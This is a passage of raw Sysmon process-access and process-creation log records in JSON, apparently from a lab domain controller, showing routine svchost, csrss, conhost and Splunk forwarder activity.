05:55:51.522","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6007,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.522\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:51.522","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6008,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.522\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:51.522","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6009,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.522\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:51.522","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6010,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.522\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:51.522","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6011,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.522\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03E7-5F25-0000-00108B100B00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:51.522","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03E7-5F25-0000-00108B100B00}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6012,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.163\r\nProcessGuid: {A837DB8D-03E9-5F25-0000-001073120B00}\r\nProcessId: 2292\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.163","ProcessGuid":"{A837DB8D-03E9-5F25-0000-001073120B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6013,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.163\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03E9-5F25-0000-001073120B00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.163","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03E9-5F25-0000-001073120B00}","TargetProcessId":"2292","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6014,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.163\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03E9-5F25-0000-001073120B00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.163","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03E9-5F25-0000-001073120B00}","TargetProcessId":"2292","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6015,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.163\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 